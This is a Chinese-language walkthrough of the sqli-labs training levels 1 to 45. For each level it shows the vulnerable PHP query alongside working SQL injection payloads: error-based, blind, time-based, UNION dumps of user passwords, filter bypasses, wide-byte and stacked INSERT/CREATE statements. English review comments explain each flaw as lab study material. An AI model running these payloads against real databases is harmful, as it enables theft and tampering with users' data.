sqli-less 筆記
一 '
?id=1'
?id=1' and 1=1%23
?id=1' and 1=2%23
二 數值
?id=1'
?id=1 and 1=1%23
?id=1 and 1=2%23
三 ')
?id=1'
?id=1') and 1=1%23
?id=1') and 1=2%23
四 ")
?id=1")
?id=1") and 1=1%23
?id=1") and 1=2%23
五 ' 報錯
1' and updatexml(1,concat(0x23,(database())),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23
六 " 報錯
1" and updatexml(1,concat(0x23,(database())),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23
七 ')) 盲注
1')) and length(database())=8 %23 //求資料庫的長度
1')) and ascii(substr(database(),1,1))=115%23 //求資料庫名的ascii值
1')) and (select count(table_name) from information_schema.tables where table_schema='security')=4%23 //求表的數量
1')) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23 //求表名的ascii碼值
1')) and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23 //求列的數量
1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 %23 //求列名的ascii碼值
1')) and (select count(username) from security.users)=13 %23 //求欄位的內容
1')) and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23 //求欄位的ascii碼值
八 ' 盲注
(參考七)
九 ' 時間型盲注
?id=1' and if(length(database())>10,sleep(0),sleep(5))%23
十 " 時間型盲注
(參考九)
十一 '報錯
// Less-11: both $uname and $passwd are spliced straight into the SQL text; no escaping is shown
// for either, so the password field becomes the injection point in the inputs below.
// NOTE(review): a prepared statement with bound parameters removes this whole class of bug.
@$sql="SELECT username,password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
username輸入:admin
password輸入:admin' and updatexml(1,concat(0x23,(database())),0)#
admin' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)#
十二 ")報錯
// Less-12: the values are wrapped in double quotes and then parenthesised in the query.
// Wrapping is not escaping — a double quote inside the value still closes the literal.
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
// NOTE(review): bind $uname/$passwd as parameters instead of building the string.
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
username輸入:admin
password輸入:1") and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)
十三 ')報錯
// Less-13: same concatenation as Less-11, only the literal is parenthesised ('…').
// The extra parenthesis changes the closing sequence, not the exposure.
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
username輸入:admin
password輸入:admin') and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)
十四 "報錯
// Less-14: double-quoted variant of Less-11; the quoting is done by string concatenation,
// so a '"' in the submitted value is not neutralised.
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
username輸入:admin
password輸入:admin" and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)
十五 '(布林型、時間)盲注
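// Less-15: the closing double quote of the string literal was missing in the transcription; restored.
// Both values are concatenated unescaped. Nothing is echoed back here, so the section relies on
// timing (sleep()) as its oracle — a slow-query alert is a useful detection for this pattern.
// NOTE(review): bind $uname/$passwd as parameters.
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";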
username輸入:admin
password輸入:admin' and sleep(if(length(database())>10,0,5))#
十六 "(布林型、時間)盲注
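// Less-16: double-quoted, parenthesised variant of Less-15. The closing '"' of the $sql literal
// was missing in the transcription; restored.
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
// Wrapping in quotes is not escaping; the value still reaches the SQL text verbatim.
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";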
username輸入:admin
password輸入:admin") and sleep(if(length(database())>10,0,5))#
十七 報錯
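// Less-17: the closing '"' of the first literal was missing in the transcription; restored.
// The SELECT only reads $uname; the UPDATE that follows concatenates the new password ($passwd)
// and the username read back from the first query ($row1) — the injection point here is the
// password-change statement, not the login lookup.
// NOTE(review): both statements should use bound parameters; error output from the UPDATE
// should not be returned to the client.
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";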
username admin
password admin' or updatexml(1,concat(0x7e,(database())),0) or '1
十八 User-Agent報錯 burp攔截
username admin
password admin
// Less-18: the User-Agent request header is client-controlled input like any form field,
// yet it is concatenated into the INSERT with no escaping shown.
$uagent = $_SERVER['HTTP_USER_AGENT'];
// NOTE(review): $uname appears unquoted in VALUES as transcribed — presumably quoted upstream; verify.
// Bind all three values as parameters.
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
uagent後加 1' or updatexml(1,concat(0x7e,(database())),0) or '
十九 referer報錯 burp攔截
// Less-19: same pattern as Less-18 with the Referer header; headers must be treated as untrusted.
$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
referer後加 1' or updatexml(1,concat(0x7e,(database())),0) or '
二十 ' burp攔截 聯合查詢
第一步:用某一個賬號aaa登入成功
第二步:重新整理頁面,用burp攔截,修改cookie欄位
// Less-20: $cookee comes from the uname cookie (see the steps above). A cookie set by the
// server is still echoed back by the client and can be rewritten; it is untrusted input.
// SELECT * also returns every column, which is what lets the UNION below read arbitrary data out.
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
在uname=aaa後輸入 ' order by 3%23
在uname=aaa後輸入 ' and 1=2 union select 1,2,3%23
在uname=aaa後輸入 ' and 1=2 union select 1,database(),3%23
在uname=aaa後輸入 ' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
在uname=aaa後輸入 ' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
在uname=aaa後輸入 ' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
二十一 ') burp攔截 聯合查詢
// Less-21: the cookie is base64-decoded before use.
$cookee = $_COOKIE['uname'];
// Decoding is not sanitisation — whatever the client encoded reaches the SQL text unchanged.
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
與二十題基本相似,不同的是,閉合條件為單引號加括號,cookie中uname編碼為base64
uname=aaa') order by 3# -> uname=YWEnKSBvcmRlciBieSAzIw==
uname=aaa') and 1=2 union select 1,2,3# -> uname=YWFhJykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMj
uname=') and 1=2 union select 1,2,database()# -> uname=JykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
(參考二十)
二十二 " burp攔截 聯合查詢
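// Less-22: cookie value, base64-decoded and then wrapped in double quotes.
// (A truncated duplicate of the $_COOKIE line left by the page extraction has been dropped.)
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
// Decoding and quote-wrapping are not escaping; the decoded value reaches the SQL text verbatim.
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";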
與二十一題基本相似,不同的是,閉合條件為雙引號
(參考二十一)
二十三 ' 聯合查詢
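// Less-23: comment-token filter. As transcribed the $_GET read came last and would have
// overwritten the filtered value; in the lab source the read precedes the filter, so it is
// placed first here.
$id=$_GET['id'];
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
// Only '#' and '--' are removed. The inputs below simply balance the quotes instead of
// commenting out the tail of the statement, so stripping comment tokens does not help.
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
// NOTE(review): $id is still concatenated unescaped — bind it as a parameter.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";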
1' and 1=2 union select 1,2,'3
1' and 1=2 union select 1,database(),'3
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users where '1'='1
二十四
使用者註冊login_create.php
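// login_create.php (Less-24): the registration INSERT concatenates $username and $pass; no
// escaping is shown for either. A stray trailing "、" left by the extraction has been removed.
// The stored username is later interpolated by pass_change.php — the second-order injection
// the section refers to — so escaping at login time does not protect that later query.
// NOTE(review): bind both values here and in every later statement that reads them back.
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";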
username輸入:admin'#
password隨意
使用者登入login.php
// login.php (Less-24): both inputs are escaped before concatenation, so the login query itself
// is not the weak point in this level.
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
密碼修改pass_change.php
// pass_change.php (Less-24): $username is taken from the session — i.e. the value stored at
// registration — and is NOT escaped, while the three POST fields are.
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
// "Already in the database" does not mean "safe to concatenate": data must be bound at the
// point of use, not trusted because it was escaped once on the way in.
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
二次排序注入
二十五 聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
// Less-25 filter: a single pass removing every case-insensitive "or" / "and" substring.
// It is not re-applied, and it also mangles benign identifiers containing those letters
// (the inputs below have to write "passwoorrd" to survive it).
// NOTE(review): keyword blacklists are not a substitute for parameterised queries.
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);
return $id;
}
// The filtered value is still concatenated unescaped.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' anandd 1=2 union select 1,2,'3
1' anandd 1=2 union select 1,database(),'3
1' anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security
1' anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users
1' anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users where '1'='1
二十五a 聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
// Less-25a: same single-pass "or"/"and" filter as Less-25, but $id is used numerically
// (no quotes around it), so no quote character is needed in the input at all.
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);
return $id;
}
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// Author's illustration of the query with the raw input spliced in; after blacklist() runs,
// "oorr" has become "or".
$sql="SELECT * FROM users WHERE id=1 oorr updatexml(1,concat(0x23,database()),1) %23 LIMIT 0,1";
1 oorrder by 3%23
1 anandd 1=2 union select 1,2,3%23
1 anandd 1=2 union select 1,database(),3%23
1 anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'%23
1 anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'%23
1 anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users%23
二十六 聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
// Less-26 filter. Each rule is a single pass; the bracketed patterns are character classes,
// so they remove individual characters, not the two-character sequences the comments name.
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
// Whether [\s] matches a vertical tab (%0B, used throughout the inputs below) depends on the
// PCRE build — older builds did not include \x0B in \s.
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
// NOTE(review): however long this list grows, $id still lands in the SQL text unescaped;
// bind it as a parameter.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name='users
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,group_concat(username,0x23,passwoorrd)%0Bfrom%0Bsecurity.users%0Bwhere%0B'1'='1
二十六a聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
// Less-26a: identical filter to Less-26; only the closing sequence in the query differs ('…').
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
// Parenthesised literal; the concatenation is unchanged.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0B infoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name=('users
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(username,0x23,passwoorrd),3%0bfrom%0bsecurity.users%0bwhere%0b('1'='1
二十七
// Less-27 filter. '[ +]' is a character class: it removes space and '+' characters only.
// The union/select rules are case-sensitive and enumerate a handful of spellings, so any
// other casing passes through (the inputs below use uNion / selEct).
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
// NOTE(review): case-sensitive keyword lists cannot be made complete; bind $id instead.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name='users
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B'1'='1
二十七a
// Less-27a: double-quoted variant (presumably with the same blacklist() as Less-27 — not shown).
// Wrapping in quotes is not escaping.
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2, "3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),"3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema="security
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name="users
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B"1"="1
二十八
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// Less-28 filter: the only keyword rule left is a case-insensitive 'union\s+select', which
// requires whitespace between the two words. Whether \s matches a vertical tab (%0B, used in
// the inputs below) depends on the PCRE build — older builds did not include \x0B in \s.
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name=('users
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0Bsecurity.users%0Bwhere%0B('1'='1
二十八a
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// Less-28a: every rule except 'union\s+select' is commented out, so comment tokens and
// spaces pass through untouched. See Less-28 for the \s / vertical-tab caveat.
function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
//$id= preg_replace('/[--]/',"", $id); //Strip out --.
//$id= preg_replace('/[#]/',"", $id); //Strip out #.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out spaces.
return $id;
}
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band%0btable_name=('users
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,password),3%0Bfrom%0B security.users%0Bwhere%0B('1'='1
二十九
// Less-29: plain single-quoted concatenation of $id. NOTE(review): bind $id as a parameter.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十
// Less-30: $id is wrapped in double quotes by concatenation; a '"' in the value is not neutralised.
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1" order by 3%23
1" and 1=2 union select 1,2,3%23
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1" and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十一
// Less-31: double-quoted and parenthesised; the concatenation itself is unchanged.
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";
1") order by 3%23
1") and 1=2 union select 1,2,3%23
1") and 1=2 union select 1,database(),3%23
1") and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1") and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1") and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十二 寬位元組注入
$id=check_addslashes($_GET['id']);
// Less-32: hand-rolled escaping — prefixes a backslash to '\', '\'' and '"'.
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);
$string = preg_replace('/\'/i', '\\\'', $string);
$string = preg_replace('/\"/', "\\\"", $string);
return $string;
}
// Escaping alone is insufficient here: the section is titled 寬位元組注入 (wide-byte injection)
// and the inputs below lead with %df, i.e. the inserted 0x5C escape byte is absorbed into a
// multi-byte character under the connection charset (presumably GBK — confirm against the lab config).
// NOTE(review): set the connection charset through the client API and bind $id as a parameter;
// byte-level escaping that ignores the charset is not a defence.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十三
$id=check_addslashes($_GET['id']);
// Less-33: same as Less-32 with PHP's addslashes(). addslashes() is charset-unaware, so the
// same %df-prefixed inputs apply.
function check_addslashes($string)
{
$string= addslashes($string);
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十四 聯合 burp攔截
// Less-34: POST login with addslashes() on both fields.
$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
// addslashes() is charset-unaware (see Less-32/33); the inputs below also use hex literals
// such as 0x61646d696e so that no quote character is needed at all.
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
0x61646d696e(admin)
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23
三十五
// Less-35: fragment of check_addslashes() (its definition is not reproduced here).
$string = addslashes($string);
$id=check_addslashes($_GET['id']);
// $id is used numerically, so quote escaping is irrelevant: the inputs below contain no quotes.
// NOTE(review): cast/validate as an integer or bind it as a typed parameter.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十六 MYSQL檔案裡面的my.ini裡面的gbk改為Latin1
$id=check_quotes($_GET['id']);
// Less-36: mysql_real_escape_string() escapes according to the charset the client connection
// negotiated; the heading notes a server-side my.ini change (gbk → Latin1) for this level,
// which is why the %df inputs below are still shown as applicable. Verify against the lab config.
function check_quotes($string)
{
$string= mysql_real_escape_string($string);
return $string;
}
// NOTE(review): set the charset via the client API (not only server config) and bind $id.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十七 burp攔截
// Less-37: POST login; escaping is not shown, but the %df inputs below indicate the same
// charset-dependent escaping issue as Less-34.
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23
三十八 ' 基於聯合查詢的堆疊注入
// Less-38: as Less-29, but the driver here executes multiple statements, so the last input
// below appends an INSERT. NOTE(review): besides binding $id, do not enable multi-statement
// execution for request-driven queries; audit logs for unexpected DDL/DML from the web user.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
1';insert into users(username,password) values('less38','less38')%23
三十九 數值
// Less-39: numeric context, no quotes needed in the input. NOTE(review): validate $id as an integer.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)
四十 ')
// Less-40: parenthesised single-quoted literal; the concatenation is the defect, not the delimiter.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1') order by 3%23
1') and 1=2 union select 1,2,3%23
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1') and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)
四十一
// Less-41: numeric context, same as Less-39.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)
四十二 堆疊注入 報錯
Login
// Less-42: only $username is escaped; $password is concatenated raw, and the inputs below
// show it being used to append a second statement (stacked query).
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
// NOTE(review): escape/bind every value, not just the one that "looks" like an identifier,
// and do not run request-driven queries with multi-statement execution enabled.
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
賬號隨意
密碼 a';create table W like users# //新增表
密碼 a';insert into users values(20,'xj','xj123')# //新增賬號密碼
登入進去修改密碼
四十三
Login
// Less-43: as Less-42 with parenthesised literals; $password is still unescaped.
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(21,'xj','xj123')#
同上
四十四
// Less-44: identical to Less-42 (the notes say errors are not displayed here, which changes
// the feedback channel, not the exposure).
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
a';insert into users values(22,'w','w')#
同上
四十五
// Less-45: identical to Less-43; $password is still unescaped.
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
